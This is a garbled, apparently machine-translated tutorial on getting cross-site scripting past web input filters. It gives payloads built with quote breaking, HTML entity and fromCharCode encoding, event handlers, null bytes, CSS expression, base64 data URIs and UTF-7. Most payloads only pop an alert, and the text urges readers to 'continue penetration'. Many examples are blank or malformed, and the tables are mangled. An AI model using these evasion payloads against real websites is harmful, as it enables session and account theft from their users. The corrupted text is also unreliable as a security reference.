XSS bypass Technology

Cross-Site Scripting (XSS) is a type of security vulnerability that occurs in web applications. Attackers can insert some code through XSS so that other users can access the page, XSS can be seen as a vulnerability. It allows attackers to bypass the security mechanism and insert malicious code in different ways. attackers can gain access to sensitive pages, sessions, cookies, and other things. XSS is divided into three types.
 
 
XSS category:
Non-persistent, persistent, and Dom-based (this class can be persistent or not persistent)
 
 
Non-persistent: non-persistent XSS is also called reflective XSS, which is currently the most common type. When attackers provide some code, the server immediately returns the page execution results. For example, if a search engine on a webpage contains html tags, the search results are usually displayed in this form, or, at least, the searched string will be included in the page. This can be modified. If any search string is not html-encoded, the XSS vulnerability is generated.
 
 
Persistent XSS: A stored XSS vulnerability or a secondary vulnerability that can cause more effective attacks. When the data submitted by attackers to web applications is permanently stored on the server, such vulnerabilities (such as databases, file systems, and other locations) are generated, if the code is not HTML-encoded, every user accessing the page will be attacked. A typical example is the online message board, which allows the user to submit data.
 
 
DOM-based XSS: Also called local cross-site, standard Object Model Based on the Document Object Model (DOM) in html/xml. This type of vulnerability occurs in the client script on the page, for example, if a javascript script processes url request parameters and then uses this parameter value to display them to the user page without any encoding, the XSS vulnerability is generated and is similar to a non-persistent one, attackers can use malicious code to fill in this parameter, and then overwrite the page to trick users into clicking it. Then, the browser parses the parameter into html and contains malicious script code.
 
FoundXSSVulnerabilities

 
The most common XSS vulnerability test code ::
 
<Script> alert ("XSS") </script>
 
 
When the code is injected into the input box or url parameter, it may succeed or fail, if it fails. It does not mean that the website is secure. Continue penetration.
Escape string
 
The first step is to check the source code of the current page to see if it contains our test string, if you find out. You will find it interesting. Be careful. See. Is in an INput label.
 
<INPUT type = "text" value = '<SCRIPT> alert ("XSS") </SCRIPT>'>
 
 
In this example, we can modify our input to contain two characters to let the code jump out of the pair of peripheral single quotes,
 
'> <SCRIPT> alert ("XSS") </SCRIPT>
 
 
Now our code is executed. Because we closed the preceding html Tag, we triggered XSS. However, you may find that an extra single quotation mark is displayed on the page. Why, because the original single quotes below do not match, we continue to modify our code.
 
'> <SCRIPT> alert ("XSS") </SCRIPT> <xss a ='
 
 
All input will become like this:
 
<INPUT type = "text" value = ''> <SCRIPT> alert (" XSS ") </SCRIPT> <xss a =''>
 
 
OK. Javascript code is injected. <Xss a = "> This is meaningless. You can change it by yourself, but it complies with html standards and the page will not go wrong.
 
Filter continues without single quotes!
 
In the same example, we assume that the Administrator places a "\" before the single quotation marks, and sometimes the double quotation marks are placed before
Some functions similar to add_slashes can be implemented. This is the escape character, and our previous Code will become like this:
 
<INPUT type = "text" value = '\'> <SCRIPT> alert (\ "XSS \") </SCRIPT> '>
 
 
There are some ways to continue, but it depends on how the filter function is put. One of the methods is to use character entities. Anyone who has learned html knows that some special characters are expressed by some inherent symbol combinations. For example, you cannot use <> to indicate greater than or less than, because this is interpreted as an html Tag. However, if you want to use it, you can use the following instead.
 

& Amp; #34;	& Quot;	"	Double quotation marks
& #38;	& Amp;	&	& Symbol
& #60;	& Lt;	<	Yu no.
& #62;	& Gt;	>	Yu no.

 
 
Use & quot; or & #34;
To replace our double quotation marks. Sometimes we can bypass filtering. Example:

<Script> alert ("XSS") </script>
<Script> alert (& quot; XSS & quot;) </script>
 
<Script> alert (& #38; XSS & #38;) </script>
 
If this is all filtered out. Then we can use the fromCharCode function of JavaScript, which converts the specified Unicode
Converts a value to a string.
 
For example:
 
<Script> alert ("XSS") </script>
 
<Script> alert (String. fromCharCode (88,83, 83) </script>
 
<INPUT type = "text" value = '\'> <SCRIPT> alert (String. fromCharCode (88,83, 83) </SCRIPT> '>
 
 
 
You can use the char (character, character) of the Mysql database to convert the character to the escape code. You can just use your favorite character.
There are still many transcoding tools.
 
Bypass  < S CR IP T > Filter
 
Some filters will filter the <script> tag, and the above example will be discarded,. There is still a way to insert javascript. Me
Let's look at the event processor example.
 
<BODY onload = "alert ('xsss')">
 
 
In html. This Onload keyword is an event. All other tags do not have this attribute, but the Body tag does. However, there are some limitations if the onload event has been processed before your code. That won't be triggered .. No, we can continue to look at onerror event processing.
 

 
 
Note that the image is not specified, that is, an error occurs. The Onerror event will trigger tea. XSS vulnerability caused, not used <script>
Tag.
 
Use  I M G Source
 
The img and a href tags that are most commonly used in Html are generally not filtered. One specified image and one specified hyperlink are used. The most dangerous
The img label. The following are some examples:
Standard Format:
 

 
 
No double quotation marks or semicolons:

 
 
Double quotation marks and <script> are filtered:
 

 
 
Use CharCode to bypass Filtering:
 

 
 
Experienced attackers can also convert all the preceding codes into equal Ascii codes:
 
1; & #114; & #116; & #40; & #39; & #88; & #83; & #83; & #39; & #41;>
 
 
You can try the Ascii table by yourself. Of course, it is also possible to convert to hexadecimal ..
 
; & # X65; & # x72; & # x74; & # x28; & # x27; & # x58; & # x53; & # x53; & # x27; & # x29;>
 
 
Tabulation Character , Line breaks and carriage returns
 
These symbols can be used to fool the filter.
 

 
The preceding example uses the smallest hexadecimal tab to fool the filter. The final output result remains unchanged.
 

 
 
 

Type	Horizontal Tab	New line	Carriage Return
URL	% 09	% 10	% 13
Minimal Sized Hex	& # X9	& # XA	& # XD
Maximum Sized Hex	& # X0000009;	& # X000000A;	& # X000000D;
Minimum Sized Decimal	& #9	& #10	& Amp; #13
Maximum Sized Decimal	& # X0000009;	& # X0000009;	& #0000009;

 
 
Use null characters
 
Another option that can be bypassed is the null character, which is the most effective tool ..
 
The following is an example. :
<SCR % 00ert> alert ("XSS") </SCRIPT>
 
 
NULL characters (% 00) Make the filter unable to see the complete <SCRIPT> tag. Only in IE 6.0, IE 7.0.
 
Double quotation marks  Bug
 
Bypassing this filtering means finding closed tags and constructing them to break through
 
For example:
 
<SCRIPT> alert ('xsss') </SCRIPT>">
 
We usually think that in the img label. The first two quotation marks are regarded as a pair and do nothing. The next quotation marks match the last one. But this is not the case. All browsers are trying to fix this problem.
 
The result is as follows:
 
<script> alert ('xss') </script> "& gt;
 
Bypass  C S S Filter
 
HTML tags are useful for inserting javaScript, but CSS is also acceptable. There are many ways to insert XSS into CSS
There are more methods to attack. The method at the top of the mouth is to put the XSS code in the href attribute referenced by the LINK method.
 
<Link rel = "stylesheet" HREF = "javascript: alert ('xsss');">
 
 
Ie7 is no longer allowed. However, opera and ie6 .. The other method is to use the <STYLE> label, which is not very common. It is generally a forum. Allows users to design their own source code.
 
<STYLE> a {width: expression (alert ('xss')} </STYLE>
 
There is another way
 
<Div style = "width: expression (alert ('xss');">
 
 
 
Incomplete Filter
 
Let's take a look at what developers can think. Is it safe? No. We can still give instructions to data
(I saw it some time ago. I forgot the correct translation.) insert the code. We use base64 Encryption
<Script> alert ('xss') </script>.
 
 
 
<META HTTP-EQUIV = "refresh" CONTENT = "0; url = data: text/html; base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
K "> data commands allow us to convert a complete document into a single string. It can be used in Firefox and other browsers. Nima did not make specific usage. Double quotation marks
If you need to use double quotation marks and single quotation marks. Use some weird usage ..
 

Escape characters
 
Escape characters are sometimes useful and can be used to deal with some simple filters.

 
The result is as follows:
 

 
 
 
Encoding
 
Using utf-7 encoding can bypass
 
For example
 
<Script> alert ("XSS") </script>
 
After using UTF-7 encoding:
 
+ ADw-script + AD4-alert (+ ACI-XSS + ACI-) + ADw-/script + AD4-
 
Then all the plus signs need to be changed to % 2b, otherwise they will be recognized as connectors by the browser.
 
% 2BADw-script % 2BAD4-alert % 281% 29% 2BADw-/script % 2BAD4-
 
A list:
 

Character	Entity reference
Space	% 20
/	% 2F
"	% 22
?	% 3F
+	% 2B

 
 
OK. That's it.